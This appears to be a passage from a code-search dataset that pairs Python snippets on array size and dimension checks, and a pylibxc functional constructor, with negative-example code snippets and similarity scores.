__DimSiz_restriction_incorrect_ndarray_ndarray_pedantic3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array [pedantic] (3) (incorrect)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 1, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 4)\n RxCSObject.aParameter1 = np.random.randn(3, 2)\n\n self.__parametersCheck_error(RxCSObject, ValueError, strTestName)", "def check_array_lengths(inputs, targets, weights=None):\n\n def is_tensor_or_composite_tensor(x):\n return tensor_util.is_tf_type(x) or is_composite_or_composite_value(x)\n\n def set_of_lengths(x):\n # Returns a set with the variation between\n # different shapes, with None => 0\n if x is None:\n return {}\n else:\n return set([\n y.shape[0]\n for y in x\n if y is not None and not is_tensor_or_composite_tensor(y)\n ])\n\n set_x = set_of_lengths(inputs)\n set_y = set_of_lengths(targets)\n set_w = set_of_lengths(weights)\n if len(set_x) > 1:\n raise ValueError('All input arrays (x) should have '\n 'the same number of samples. Got array shapes: ' +\n str([x.shape for x in inputs]))\n if len(set_y) > 1:\n raise ValueError('All target arrays (y) should have '\n 'the same number of samples. Got array shapes: ' +\n str([y.shape for y in targets]))\n if set_x and set_y and list(set_x)[0] != list(set_y)[0]:\n raise ValueError('Input arrays should have '\n 'the same number of samples as target arrays. '\n 'Found ' + str(list(set_x)[0]) + ' input samples '\n 'and ' + str(list(set_y)[0]) + ' target samples.')\n if len(set_w) > 1:\n raise ValueError('All sample_weight arrays should have '\n 'the same number of samples. Got array shapes: ' +\n str([w.shape for w in weights]))\n if set_y and set_w and list(set_y)[0] != list(set_w)[0]:\n raise ValueError('Sample_weight arrays should have '\n 'the same number of samples as target arrays. Got ' +\n str(list(set_y)[0]) + ' input samples and ' +\n str(list(set_w)[0]) + ' target samples.')", "def test_size_returns_length(dq_3):\n assert dq_3.size() == 3", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def __DimSiz_restriction_correct_ndarray_ndarray(self):\n\n strTestName = 'The size of a dimension of a Numpy array equals the size of a dimension of another Numpy array (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 'aParameter1', 'columns', 'rows')\n\n RxCSObject.parameter1 = np.random.randn(5, 4, 3) # 5 pages, 4 rows, 3 columns *\n RxCSObject.aParameter1 = np.random.randn(3, 4) # 3 rows* , *2 columns\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_ndim(self):\r\n # 'ndim' is an optional integer parameter, specifying the length\r\n # of the 'shape', passed as a keyword argument.\r\n\r\n # ndim not specified, OK\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.uniform((2,2)))\r\n\r\n # ndim specified, consistent with shape, OK\r\n random2 = RandomStreams(utt.fetch_seed())\r\n fn2 = function([], random2.uniform((2,2), ndim=2))\r\n\r\n val1 = fn()\r\n val2 = fn2()\r\n assert numpy.all(val1 == val2)\r\n\r\n # ndim specified, inconsistent with shape, should raise ValueError\r\n random3 = RandomStreams(utt.fetch_seed())\r\n self.assertRaises(ValueError, random3.uniform, (2,2), ndim=1)", "def test_size():\r\n for sparse_type in ('csc_matrix', 'csr_matrix'):\r\n x = getattr(theano.sparse, sparse_type)()\r\n y = getattr(scipy.sparse, sparse_type)((5, 7)).astype(config.floatX)\r\n get_size = theano.function([x], x.size)\r\n\r\n def check():\r\n assert y.size == get_size(y)\r\n # We verify that the size is correctly updated as we store more data\r\n # into the sparse matrix (including zeros).\r\n check()\r\n y[0, 0] = 1\r\n check()\r\n y[0, 1] = 0\r\n check()", "def testLengthsOfFunction(self):\n\t\tfunc_len = len(self.d3.func_terms)\n\t\tself.assertEqual(3, func_len)", "def has_min_len(arr, len_, kind):\n arr_len = len(arr)\n if arr_len < len_:\n raise DimensionError(\n f'Your {kind} array must be at least {len_}, '\n f'but has only length {arr_len}!'\n )\n return True", "def __DimSiz_restriction_correct_ndarray_ndarray4(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to the size of a dimension of another Numpy array (4) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 'pages', 'columns', mul=2)\n\n RxCSObject.parameter1 = np.random.randn(2, 3, 4) # * 5 pages, 3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # 4 pages, 3 rows, * 1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_smaller_iterable_len(self):\n with self.subTest(input='list'):\n self.assertEqual(get_n_chunks(self.test_data, iterable_len=5, chunk_size=None, n_splits=None, n_jobs=None),\n min(5, cpu_count() * 4))\n with self.subTest(input='numpy'):\n self.assertEqual(get_n_chunks(self.test_data_numpy, iterable_len=5, chunk_size=None, n_splits=None,\n n_jobs=None), min(5, cpu_count() * 4))\n with self.subTest(input='generator/iterator'):\n self.assertEqual(get_n_chunks(iter(self.test_data), iterable_len=5, chunk_size=None, n_splits=None,\n n_jobs=None), min(5, cpu_count() * 4))", "def __DimSiz_restriction_correct_ndarray_parameter(self):\n\n strTestName = 'The size of a dimension of a Numpy array equals a parameter (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('iParameter1', 'Int parameter')\n RxCSObject.paramType('iParameter1', int)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 'iParameter1', 'pages')\n\n RxCSObject.iParameter1 = 1\n RxCSObject.parameter1 = np.random.randn(4, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_bootstrap_array_shape():\n test_array = np.zeros((3, 4))\n test_axis = 1\n nboot = 5\n new_array = utils.bootstrap_array(test_array, nboot=nboot, axis=test_axis)\n shape = (3, 4, 5)\n assert shape == new_array.shape", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def _assert_is_batched(self, *arrays):\n shape_list = []\n for array in arrays:\n if isinstance(array, tf.Tensor):\n shape_list.append(array.shape.as_list())\n else:\n shape_list.append(np.shape(array))\n # All arrays should have at least two dimensions.\n assert all([len(shape) >= 2 for shape in shape_list])\n # All arrays should have the same batch size.\n assert len(set([shape[0] for shape in shape_list])) == 1", "def __DimSiz_restriction_incorrect_ndarray_ndarray3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array (3) (incorrect)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimH('parameter1', 'aParameter1', 'pages', 'pages', mul=2)\n\n RxCSObject.parameter1 = np.random.randn(8, 3, 4) # * 5 pages, 3 rows, *4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # * 4pages, 3 rows, *1 column\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def test_has_correct_length(self) -> None:\n assert len(list(self._dataset)) == 7168", "def test_array() -> None:\n soup = generate_case(\"array\")\n\n tests.html_schema_doc_asserts.assert_property_names(soup, [\"fruits\", \"vegetables\", \"veggieName\", \"veggieLike\"])\n tests.html_schema_doc_asserts.assert_descriptions(\n soup,\n [\n \"A schema with an array\",\n \"The name of the vegetable.\",\n \"Do I like this vegetable?\",\n ],\n )\n tests.html_schema_doc_asserts.assert_types(\n soup, [\"object\", \"array of string\", \"string\", \"array\", \"object\", \"string\", \"boolean\"]\n )\n tests.html_schema_doc_asserts.assert_required(soup, [False, False, True, True])", "def check_array_ndim(arr, name, expected_ndim=2):\n # We just need to check that the number of dimensions if equal to expected_ndim\n ndim = len(arr.shape)\n check_value(is_valid=(ndim == expected_ndim), error_msg=\n 'The number of dimension of ' + name\n + ' is ' + str(ndim) + ' but is expected to be ' + str(expected_ndim))\n\n return arr", "def test_n_dim(self):\n with Pandas() as pd:\n if pd is None:\n return\n with Numpy() as np: # noqa\n if numpy is None:\n return\n sys.stderr.write(\"\\n\")\n\n df, hist1, hist2, hist3 = get_test_histograms1()\n hist0 = hg.Count()\n\n assert hist0.n_dim == 0\n assert hist1.n_dim == 1\n assert hist2.n_dim == 2\n assert hist3.n_dim == 3", "def __len__(self):\n return len(self.array)", "def __len__(self):\n return len(self.array)", "def array_dimensions(array):\n height = len(array)\n width = len(array[0])\n\n return width, height", "def __DimSiz_restriction_correct_ndarray_ndarray2(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to the size of a dimension of another Numpy array (2) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 'aParameter1', 'columns', 2, mul=5)\n\n RxCSObject.parameter1 = np.random.randn(5, 3, 3) # 5 pages, 3 rows, *3 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # 4pages, 3 rows, *1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def _check_size_of_lists(sequence_header, secstr_header):\n if len(sequence_header) != len(sequence):\n sys.exit(\"The size of the sequence list and sequence header doesn't match\")\n else:\n return True", "def _validate_array(\n mapping: Mapping[str, Any], ref: str, types: Set[str],\n depth: int) -> Optional[SchemaError]:\n minimum_size = mapping.get('minimum_size', None)\n maximum_size = mapping.get('maximum_size', None)\n if (minimum_size is not None and maximum_size is not None\n and minimum_size > maximum_size):\n return SchemaError(\n message=(\n \"Minimum size is larger than the maximum size: \"\n \"{} > {}\").format(minimum_size, maximum_size),\n ref='{}/minimum_size'.format(ref))\n\n return _validate_type_recursively(\n mapping=mapping['values'],\n ref='{}/values'.format(ref),\n types=types,\n depth=depth + 1)", "def assert_same_size(sequences):\n seq_size = len(sequences[0])\n for seq in sequences:\n if len(seq) != seq_size:\n raise SizeError", "def __sizeof__(self, ???):", "def __DimSiz_restriction_incorrect_ndarray_number2(self):\n\n strTestName = 'The number of rows of a Numpy array equals to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 1, 'columns')\n\n RxCSObject.parameter1 = np.random.randn(3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def _check_array(X):\n return check_array(X,\n accept_sparse=['csr', 'csc'], # Accept sparse csr, csc\n order=None, # Do not enforce C or Fortran\n copy=False, # Do not trigger copying\n force_all_finite=True, # Raise error on np.inf/np.nan\n ensure_2d=True, # Force 'X' do be a matrix\n allow_nd=True, # Allow 'X.ndim' > 2\n warn_on_dtype=False # Mute as 'dtype' is 'None'\n )", "def debug_get_simple_size(self, _train=None, _validation=None):\n if np.any(_train):\n self.train_check = list()\n self.train_check.append(_train)\n if np.any(_validation):\n self.val_check = list()\n self.val_check.append(_validation)", "def test_get_length(t_list):\n if not get_length(t_list) == 10:\n raise ValueError(\"Wrong number of transactions\")", "def __DimSiz_restriction_incorrect_ndarray_ndarray_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower than the size of a dimension of another Numpy array [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimL('parameter1', 'aParameter1', 'rows', 'columns', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 4) # *3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(3, 2) # 3 rows, * 2 columns\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def match_size(*arrays):\n target = arrays[0].datashape\n result = []\n\n # check for bad inputs\n for a in arrays:\n ds = a.datashape.copy()\n for i in range(min(a.ndim, target.ndim)):\n if ds.dim_low[i] < target.dim_low[i] or \\\n ds.dim_high[i] > target.dim_high[i]:\n raise ValueError(\"All array domains must be a subset \"\n \"of the first array's domain\")\n\n for a in arrays:\n ds = a.datashape.copy()\n ds.dim_low = list(ds.dim_low)\n ds.dim_high = list(ds.dim_high)\n\n for i in range(min(a.ndim, target.ndim)):\n ds.dim_low[i] = target.dim_low[i]\n ds.dim_high[i] = target.dim_high[i]\n if ds != a.datashape:\n a = a.redimension(ds.schema)\n result.append(a)\n\n return tuple(result)", "def __DimSiz_restriction_correct_ndarray_tuple(self):\n\n strTestName = 'The size of a dimension of a Numpy array equals the size of a tuple (correct) '\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('tParameter1', 'Tuple parameter')\n RxCSObject.paramType('tParameter1', tuple)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 'tParameter1', 'pages', 1, mul=2, add=-1)\n\n RxCSObject.tParameter1 = (3, 4, 5, 6, 7)\n RxCSObject.parameter1 = np.random.randn(2, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_tuple_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower than the size of a tuple [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('tParameter1', 'Tuple parameter')\n RxCSObject.paramType('tParameter1', tuple)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimL('parameter1', 'tParameter1', 'rows', 0, pedantic=1)\n\n RxCSObject.tParameter1 = (3, 4, 5, 6, 7)\n RxCSObject.parameter1 = np.random.randn(4, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __len__(self):\n return self._arr.shape[1]", "def __DimSiz_restriction_incorrect_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (2) [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 2, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def __DimSiz_restriction_incorrect_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 4)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def num_elements_eval_function_capped(individual, test_data, truth_data, name=None):\r\n return max(len(individual), 1707)", "def test_bytearray_respects_length(self):\n self._respects_length_test(bytearray)", "def __len__(self):\n n = 1\n for valTuple in self._valListOfLists:\n n *= len(valTuple)\n return n", "def ExceptionPropertyLength_test(type: str):\n m = pyflamegpu.ModelDescription(\"model\")\n ed = m.Environment()\n add_func = getattr(ed, f\"newPropertyArray{type}\")\n set_func = getattr(ed, f\"setPropertyArray{type}\")\n \n b = [0] * ARRAY_TEST_LEN\n _b1 = [0] * 1\n _b2 = [0] * (ARRAY_TEST_LEN + 1)\n _b3 = [0] * ARRAY_TEST_LEN * 2\n\n add_func(\"a\", b)\n with pytest.raises(pyflamegpu.FLAMEGPURuntimeException) as e:\n set_func(\"a\", _b1)\n with pytest.raises(pyflamegpu.FLAMEGPURuntimeException) as e:\n set_func(\"a\", _b2)\n with pytest.raises(pyflamegpu.FLAMEGPURuntimeException) as e:\n set_func(\"a\", _b3)\n # Added extra case to ensure that the above TypeErrors are not a result of the set_func not being found\n set_func(\"a\", b)", "def test_larger_iterable_len(self):\n with self.subTest(input='list'):\n self.assertEqual(get_n_chunks(self.test_data, iterable_len=25, chunk_size=None, n_splits=None, n_jobs=None),\n min(13, cpu_count() * 4))\n with self.subTest(input='numpy'):\n self.assertEqual(get_n_chunks(self.test_data_numpy, iterable_len=125, chunk_size=None, n_splits=None,\n n_jobs=None), min(100, cpu_count() * 4))\n with self.subTest(input='generator/iterator'):\n self.assertEqual(get_n_chunks(iter(self.test_data), iterable_len=25, chunk_size=None, n_splits=None,\n n_jobs=None), min(25, cpu_count() * 4))", "def test_results_length(spheroid_convex_fixture):\n assert(len(spheroid_convex_fixture.pairs) == 1000)\n assert(len(spheroid_convex_fixture.combinations) == 1000)\n assert(len(spheroid_convex_fixture.deltas) == 1000)" ]
[ "0.6265682", "0.620982", "0.61681736", "0.6165635", "0.612598", "0.6100851", "0.606523", "0.60568863", "0.6044883", "0.60175836", "0.6015358", "0.60039693", "0.599243", "0.59703016", "0.59418064", "0.5937286", "0.59317034", "0.59271264", "0.59253454", "0.5924653", "0.59069985", "0.5906962", "0.5898133", "0.58944845", "0.589207", "0.58866566", "0.58866566", "0.58866566", "0.58829695", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.58656085", "0.5864605", "0.5860173", "0.58529484", "0.5824478", "0.5815255", "0.57947916", "0.5787374", "0.5743897", "0.57401043", "0.57379305", "0.5730442", "0.5709762", "0.57020426", "0.57016903", "0.5698339", "0.5698339", "0.5698339", "0.5698339", "0.5698339", "0.5698339", "0.5688884", "0.56886095", "0.5687448", "0.5683368", "0.56801105", "0.56550324", "0.5651036", "0.5651036", "0.5637659", "0.5626933", "0.5611403", "0.5611245", "0.5608458", "0.56079173", "0.56040835", "0.5594397", "0.55941635", "0.55894583", "0.5587027", "0.55767035", "0.5574732", "0.55720615", "0.5562287", "0.55583113", "0.5556561", "0.5552598", "0.5549568", "0.5549447", "0.554527", "0.55387354", "0.55368376" ]
0.5808242
54
The primary LibXCFunctional class used to build and compute DFT exchangecorrelation quantities.
def __init__(self, func_name, spin): self.xc_func = None self._xc_func_init = False # Handle func_name if isinstance(func_name, str): func_id = util.xc_functional_get_number(func_name) if func_id == -1: raise KeyError("LibXCFunctional: name '%s' not found." % func_name) elif isinstance(func_name, (int, np.integer)): func_id = func_name if util.xc_functional_get_name(func_name) is None: raise KeyError("LibXCFunctional: ID '%d' not found." % func_name) else: raise TypeError("LibXCFunctional: func_name must either be a string or int. Got {}".format(func_name)) self._xc_func_name = util.xc_functional_get_name(func_id) # Handle spin if isinstance(spin, str): spin = spin.lower() if spin == "polarized": self._spin = 2 elif spin == "unpolarized": self._spin = 1 else: raise KeyError("LibXCFunctional: spin must either be 'polarized' or 'unpolarized' if represented by a string. Got {}".format(spin)) else: self._spin = spin if self._spin not in [1, 2]: raise KeyError("LibXCFunctional: spin must either be 1 or 2 if represented by a integer. Got {}".format(self._spin)) # Build the LibXC functional self.xc_func = core.xc_func_alloc() self.xc_func_size_names = [x for x in dir(self.xc_func.contents.dim) if not "_" in x] # Set all int attributes to zero (not all set to zero in libxc) for attr in self.xc_func_size_names: setattr(self.xc_func.contents, attr, 0) ret = core.xc_func_init(self.xc_func, func_id, self._spin) if ret != 0: raise ValueError("LibXC Functional construction did not complete. Error code %d" % ret) self._xc_func_init = True # Pull out all sizes after init self.xc_func_sizes = {} for attr in self.xc_func_size_names: self.xc_func_sizes[attr] = getattr(self.xc_func.contents.dim, attr) # Unpack functional info self.xc_func_info = core.xc_func_get_info(self.xc_func) self._number = core.xc_func_info_get_number(self.xc_func_info) self._kind = core.xc_func_info_get_kind(self.xc_func_info) self._name = core.xc_func_info_get_name(self.xc_func_info).decode("UTF-8") self._family = core.xc_func_info_get_family(self.xc_func_info) self._flags = core.xc_func_info_get_flags(self.xc_func_info) # Set needed flags self._needs_laplacian = self._flags & flags.XC_FLAGS_NEEDS_LAPLACIAN # Set derivatives self._have_exc = self._flags & flags.XC_FLAGS_HAVE_EXC self._have_vxc = self._flags & flags.XC_FLAGS_HAVE_VXC self._have_fxc = self._flags & flags.XC_FLAGS_HAVE_FXC self._have_kxc = self._flags & flags.XC_FLAGS_HAVE_KXC self._have_lxc = self._flags & flags.XC_FLAGS_HAVE_LXC # Set omega self._have_cam = self._flags & flags.XC_FLAGS_HYB_CAM self._have_cam |= self._flags & flags.XC_FLAGS_HYB_CAMY self._have_cam |= self._flags & flags.XC_FLAGS_HYB_LC self._have_cam |= self._flags & flags.XC_FLAGS_HYB_LCY self._cam_omega = self._cam_alpha = self._cam_beta = False if self._have_cam: self._cam_omega = self.xc_func.contents.cam_omega self._cam_alpha = self.xc_func.contents.cam_alpha self._cam_beta = self.xc_func.contents.cam_beta elif self._family in [flags.XC_FAMILY_HYB_LDA, flags.XC_FAMILY_HYB_GGA, flags.XC_FAMILY_HYB_MGGA]: self._cam_alpha = self.xc_func.contents.cam_alpha # VV10 self._have_vv10 = self._flags & flags.XC_FLAGS_VV10 self._nlc_b = self._nlc_C = False if self._have_vv10: self._nlc_b = self.xc_func.contents.nlc_b self._nlc_C = self.xc_func.contents.nlc_C # Stable self._stable = self._flags & flags.XC_FLAGS_STABLE self._dev = self._flags & flags.XC_FLAGS_DEVELOPMENT # Pull out references self._refs = [] self._bibtexs = [] self._dois = [] for pos in range(flags.XC_MAX_REFERENCES): ref = core.xc_func_info_get_references(self.xc_func_info, pos) if not ref: break self._refs.append(ref.contents.ref.decode("UTF-8")) self._bibtexs.append(ref.contents.bibtex.decode("UTF-8")) self._dois.append(ref.contents.doi.decode("UTF-8"))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_QFT(self):\n op = qml.QFT(wires=range(3))\n res = op.matrix()\n exp = QFT\n assert np.allclose(res, exp)", "def _function_class(self):\n return FriCASExpectFunction", "def calc_Cinv_FC(P_design_W, FC_cost_data):\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if P_design_W < FC_cost_data['cap_min'][0]:\n P_design_W = FC_cost_data['cap_min'][0]\n FC_cost_data = FC_cost_data[\n (FC_cost_data['cap_min'] <= P_design_W) & (FC_cost_data['cap_max'] > P_design_W)]\n\n Inv_a = FC_cost_data.iloc[0]['a']\n Inv_b = FC_cost_data.iloc[0]['b']\n Inv_c = FC_cost_data.iloc[0]['c']\n Inv_d = FC_cost_data.iloc[0]['d']\n Inv_e = FC_cost_data.iloc[0]['e']\n Inv_IR = FC_cost_data.iloc[0]['IR_%']\n Inv_LT = FC_cost_data.iloc[0]['LT_yr']\n Inv_OM = FC_cost_data.iloc[0]['O&M_%'] / 100\n\n InvC = Inv_a + Inv_b * (P_design_W) ** Inv_c + (Inv_d + Inv_e * P_design_W) * log(P_design_W)\n\n Capex_a_FC_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_fixed_FC_USD = InvC * Inv_OM\n Capex_FC_USD = InvC\n\n return Capex_a_FC_USD, Opex_fixed_FC_USD, Capex_FC_USD", "def iot_obj_func(mol_fracs, x_mix, x_pure):\n \n x_mix = np.array(x_mix)\n x_pure = np.array(x_pure)\n calc_x_mix = np.dot(mol_fracs.reshape([1, len(mol_fracs)]), x_pure)\n return ((x_mix - calc_x_mix) ** 2).sum()", "def test_coefficients_jax_interface(self):\n import jax\n\n # Need to enable float64 support\n from jax.config import config\n\n remember = config.read(\"jax_enable_x64\")\n config.update(\"jax_enable_x64\", True)\n\n qnode = qml.QNode(self.circuit, self.dev, diff_method=\"parameter-shift\")\n\n weights = jax.numpy.array([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)\n\n config.update(\"jax_enable_x64\", remember)", "def setUp(self):\n self.foreignAmount=1000.0\n self.fxFixingDate=Date(1,October,2018)\n self.familyName=\"ECB\"\n self.fixingDays=2\n self.sourceCurrency=USDCurrency()\n self.targetCurrency=EURCurrency()\n self.fixingCalendar=UnitedStates()\n self.todayDate=Date(11, November, 2018)\n self.tsDayCounter=Actual360()\n self.flatForwardUSD=FlatForward(self.todayDate, 0.005, self.tsDayCounter)\n self.sourceYts=RelinkableYieldTermStructureHandle(self.flatForwardUSD)\n self.flatForwardEUR=FlatForward(self.todayDate, 0.03, self.tsDayCounter);\n self.targetYts=RelinkableYieldTermStructureHandle(self.flatForwardEUR)\n self.fxindex=FxIndex(self.familyName,self.fixingDays,self.sourceCurrency,self.targetCurrency,self.fixingCalendar,self.sourceYts,self.targetYts)\n self.paymentDate=Date(1,November,2018)\n self.startDate=Date(1,October,2018)\n self.endDate=Date(1,November,2018)\n self.fixingDays=2\n self.gearing=1.0\n self.spread=0.0\n self.refPeriodStart=Date(1,October,2018)\n self.refPeriodEnd=Date(1,November,2018)\n self.dayCounter=Actual360()\n self.isInArrears=False\n self.tenor=Period(3,Months)\n self.settlementDays=2\n self.currency=GBPCurrency()\n self.floatIndex=USDLibor(self.tenor,self.sourceYts)\n self.undCpn = IborCoupon(self.paymentDate,self.foreignAmount, self.startDate,self.endDate,self.fixingDays,self.floatIndex,self.gearing,self.spread,self.refPeriodStart,self.refPeriodEnd,self.dayCounter)\n self.floatingratefxlinkednotionalcoupon=FloatingRateFXLinkedNotionalCoupon(self.fxFixingDate,self.foreignAmount,self.fxindex,self.undCpn)", "def _function_element_class(self):\n return FriCASFunctionElement", "def get_currency_exchange_daily(self, from_symbol, to_symbol, outputsize='compact'):\n _FUNCTION_KEY = 'FX_DAILY'\n return _FUNCTION_KEY, \"Time Series FX (Daily)\", 'Meta Data'", "def energy_function(self, x):\n \n return -T.dot(T.transpose(x), T.dot(self.W, x)) -\\\n T.dot(T.transpose(self.b), x)", "def test_implantation_flux_attributes():\n flux = 1\n imp_depth = 5e-9\n width = 5e-9\n distribution = (\n 1\n / (width * (2 * np.pi) ** 0.5)\n * sp.exp(-0.5 * ((festim.x - imp_depth) / width) ** 2)\n )\n expected_value = sp.printing.ccode(flux * distribution)\n\n my_source = festim.ImplantationFlux(\n flux=flux, imp_depth=imp_depth, width=width, volume=1\n )\n\n assert my_source.flux == flux\n assert my_source.imp_depth == imp_depth\n assert my_source.width == width\n assert my_source.value._cppcode == expected_value", "def initialize(context): \n \n \n \n context.Sentiment_multiplier = 1.7 #Number of times more bull messages than bear messages a stock must have had to be acceptable for trading\n # Create our dynamic stock selector.\n attach_pipeline(make_pipeline(context), 'my_pipeline')\n context.minCorr=0.2 #Minimum acceptable cross correlation value to make trades based on\n context.minCorr_short=.5 #Min acceptable cross correlation value (for short term tau) \n \n context.lookback=1800 #This is the number of minutes used during cross correlation of data. Note, that this should be less than 370 (390 trading day minutes - 20 min end of day stop) since we correlate same day data then trade based on those correlation. (Correlate first half the day, trade second half) \n # *****^ Same day correlation may be the best way to figure out tau, but it may be suboptimal for selecting commonly correlated stocks. This selection is more likely to make errors in picking stocks which have a coincidentally high correlation (just for one particular day). \n context.shortTau=180\n \n#Note, it may be ideal to select a tau based on the correlation method described below (just using the early half of the day) and to select likely correlated stocks seperately using a longer lookback time. ***\n#**********TODO*********************************************************\n #Methods of adding value to correlation:\n #Since we are trading on spike patterns only, it could be in our best interest to square (or even cube) the entire time series of a stock before normalizing it for (normalized) cross correlation. This would serve to exaggerate deviant values (high peaks). However, this would also underexaggerate drops, which we are interested in correlating as well. THEREFORE:\n #Correlate stocks by:\n #1.) 0 center the mean of the stock's time series. \n #2.) take the absolute value of the time series. - WHILE PRESERVING THE LOCATION (IDXS) OF NEGATIVE VALUES \n #3.) Square (or cubed the entire time series (thereby exaggerating both the peaks 